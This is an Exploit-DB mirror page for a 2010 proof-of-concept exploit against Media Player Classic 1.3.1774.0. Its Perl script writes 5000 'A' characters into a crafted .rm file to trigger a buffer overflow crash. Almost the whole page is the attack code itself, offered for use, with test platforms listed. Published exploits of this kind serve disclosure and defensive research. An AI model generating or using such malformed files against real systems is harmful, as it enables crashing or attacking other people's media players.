Media Player Classic 1.3.1774.0 – ‘.rm’ Buffer Overflow (PoC)

  • 作者: sniper ip
    日期: 2010-05-23
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12704/
  • # Exploit Title: [ Media Player Classic - v 1.3.1774.0(.rm file)buffer Overflow poc ]
    # Date: [ 2010-05-22 ]
    # Author: [ sniper ip ]
    # Software Link: []
    # Version: [ v 1.3.1774.0]
    # Tested on: [ Windowsxp2 , Windowsxp3 , Windows7 ]
    # CVE : [if exists]
    # Code : [
    
    #!/usr/bin/perl
    # |--------------------------------------------------------------------------------------------------| #
    # | -- Media Player Classic - v 1.3.1774.0 (.rm file)buffer Overflow poc --| #
    # | ---------- -- By : sniper ip # My Email : sniper-ip@hotmail.com ------------- | #
    # |--------------------------------------------------------------------------------------------------| #
    
    $buff="A" x 5000;
    open (myfile , ">>sniper.rm");
    print myfile $buff;
    close (myfile);